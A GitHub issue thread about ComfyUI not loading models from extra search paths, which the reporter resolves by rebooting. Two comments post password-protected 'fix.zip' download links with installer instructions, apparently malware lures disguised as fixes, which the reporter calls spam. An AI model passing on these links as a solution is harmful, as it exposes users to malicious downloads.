### ISSUE TITLE
New install, extra models paths not being used

### ISSUE THREAD

**Issue by jwvanderbeck** [comfyanonymous/ComfyUI#4637]
### Your question

I am setting up a new install of Comfy on a new computer.  I want to use the same models as my other two computers which already have Comfy on them, so I set this new one up the same way, mapping my drive with the models to G: and copying over the same config `extra_model_paths.yaml` file from my other installations.

When I start Comfy the log DOES indicate that it is adding these extra paths, yet when using the web app the models in these paths are NOT available.  Copying one of them to the local checkpoints directory works, but the one in the yaml do not.

As I said I have this same setup on two other machines so I'm at a loss for why this isn't working?

### Logs

```powershell
PS E:\ComfyUI> python .\main.py
Total VRAM 24563 MB, total RAM 65457 MB
pytorch version: 2.4.0+cu121
Set vram state to: NORMAL_VRAM
Device: cuda:0 NVIDIA GeForce RTX 3090 Ti : cudaMallocAsync
Using pytorch cross attention
[Prompt Server] web root: E:\ComfyUI\web
Adding extra search path checkpoints G:\05-Models\Stable-diffusion
Adding extra search path configs G:\05-Models\Stable-diffusion
Adding extra search path vae G:\05-Models\VAE
Adding extra search path loras G:\05-Models\Lora
Adding extra search path loras G:\05-Models\LyCORIS
Adding extra search path upscale_models G:\05-Models\ESRGAN
Adding extra search path upscale_models G:\05-Models\RealESRGAN
Adding extra search path upscale_models G:\05-Models\SwinIR
Adding extra search path embeddings G:\05-Models\embeddings
Adding extra search path hypernetworks G:\05-Models\hypernetworks
Adding extra search path controlnet G:\05-Models\ControlNet
Adding extra search path ipadapter G:\05-Models\ipadapter
Adding extra search path clip G:\05-Models\clip
Adding extra search path clip_vision G:\05-Models\clip_vision
Adding extra search path unet G:\05-Models\unet
C:\Python312\Lib\site-packages\kornia\feature\lightglue.py:44: FutureWarning: `torch.cuda.amp.custom_fwd(args...)` is deprecated. Please use `torch.amp.custom_fwd(args..., device_type='cuda')` instead.
  @torch.cuda.amp.custom_fwd(cast_inputs=torch.float32)

Import times for custom nodes:
   0.0 seconds: E:\ComfyUI\custom_nodes\websocket_image_save.py

Starting server

To see the GUI go to: http://127.0.0.1:8188
```
```


### Other

![image](https://github.com/user-attachments/assets/2e4e0c03-562d-4613-a7b4-45bffada4c13)

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jwvanderbeck** [comment]
Hmm after some time debugging the Python code it looks like for some reason it just plain thinks the directories don't exist even though they do.  `os.path.isdir(directory)` returns false.  So sounds like it is a Python/Windows issue.  I'll keep digging.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by jwvanderbeck** [comment]
What is with these spammers? Geesh

**Comment by jwvanderbeck** [comment]
Well apparently much ado for nothing.  I forgot the #1 rule of troubleshooting.
After rebooting my Windows machine everything works properly.
